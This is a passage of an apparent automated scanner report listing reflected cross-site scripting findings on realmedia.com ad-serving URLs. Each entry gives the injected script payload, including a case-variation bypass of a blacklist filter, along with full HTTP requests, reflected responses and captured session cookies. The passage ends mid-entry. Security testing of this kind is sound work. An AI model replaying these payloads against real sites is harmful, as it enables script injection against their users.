1.44. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:51:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011Pk0iDO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1408
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 20:52:01 GMT;path=/

<IFRAME SRC="http://ad.doubleclick.net/adi/N3158.247RealMedia/B4708174.27;sz=160x600;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/d7571"><ScRiPt>alert(1)</ScRiPt>aba5c424809/160x600/autnwsrlsttch/ss/a/L7/492651054/x10/USNetwork/BCN2010070180_063_Staples/123_160.html/726348573830307044726341416f7670?;ord=492651054?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=
...[SNIP]...

1.45. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3acec"%3b659808a9e9b was submitted in the REST URL parameter 5. This input was echoed as 3acec";659808a9e9b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork3acec"%3b659808a9e9b/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:03 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIJO2016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 875
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:03 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork3acec";659808a9e9b/160x600/autnwsrlsttch/ss/a/L7";
//-->
...[SNIP]...

1.46. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9b0"><script>alert(1)</script>0c74033a4fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork8b9b0"><script>alert(1)</script>0c74033a4fe/160x600/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIIO2016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 925
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork8b9b0"><script>alert(1)</script>0c74033a4fe/160x600/autnwsrlsttch/ss/a/L7&mm_flag=">
...[SNIP]...

1.47. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88700"%3b3040819f01d was submitted in the REST URL parameter 6. This input was echoed as 88700";3040819f01d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x60088700"%3b3040819f01d/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIPO1016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 875
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork/160x60088700";3040819f01d/autnwsrlsttch/ss/a/L7";
//-->
...[SNIP]...

1.48. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb6b"><script>alert(1)</script>15c7e547e2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x6008fb6b"><script>alert(1)</script>15c7e547e2/autnwsrlsttch/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIOO1016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2015
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:08 GMT;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x6008fb6b"><script>alert(1)</script>15c7e547e2/autnwsrlsttch/ss/a/L7&mm_flag=">
...[SNIP]...

1.49. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053e"%3be398090d692 was submitted in the REST URL parameter 7. This input was echoed as e053e";e398090d692 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/e053e"%3be398090d692/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:20 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIaO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 849
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:20 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork/160x600/e053e";e398090d692/ss/a/L7";
//-->
...[SNIP]...

1.50. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4bb6"><script>alert(1)</script>d1d8b8f699e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttcha4bb6"><script>alert(1)</script>d1d8b8f699e/ss/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:13 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxITO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2019
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:13 GMT;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x600/autnwsrlsttcha4bb6"><script>alert(1)</script>d1d8b8f699e/ss/a/L7&mm_flag=">
...[SNIP]...

1.51. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5151"><script>alert(1)</script>05718c70aef was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ssb5151"><script>alert(1)</script>05718c70aef/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:25 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxIfO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 925
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:25 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x600/autnwsrlsttch/ssb5151"><script>alert(1)</script>05718c70aef/a/L7&mm_flag=">
...[SNIP]...

1.52. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2c16"%3b16910890166 was submitted in the REST URL parameter 8. This input was echoed as f2c16";16910890166 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/f2c16"%3b16910890166/a@x10 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:33 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjxInO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 871
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:33 GMT;path=/

<script type="text/javascript"><!--
google_ad_client = "pub-7462823094262195";
/* 160x600, 247 */
google_ad_slot = "3352371048";
google_ad_width = 160;
google_ad_height = 600;
//-->
</script>

...[SNIP]...
<!--
mm_client = "87268797280";
mm_channel = "ectnews/runofnetwork/160x600/autnwsrlsttch/f2c16";16910890166/a/L7";
//-->
...[SNIP]...

1.53. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x10

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad9b5"-alert(1)-"ae5167346a4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

